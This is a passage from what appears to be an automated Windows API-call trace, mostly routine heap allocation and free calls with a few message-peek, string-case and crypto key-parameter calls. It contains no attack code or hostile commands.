RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.986] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.986] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.986] CryptGetKeyParam (in: hKey=0x6b8b78, dwParam=0x7, pbData=0x6bb4f8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4f8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.986] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.987] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0076.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.989] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0076.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.989] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8c38 [0076.990] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8c38 | out: hHeap=0x650000) returned 1 [0076.990] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.991] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.992] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.992] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.992] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.992] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bf8 | out: hHeap=0x650000) returned 1 [0076.992] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0076.992] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.993] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.994] PeekMessageW (in: 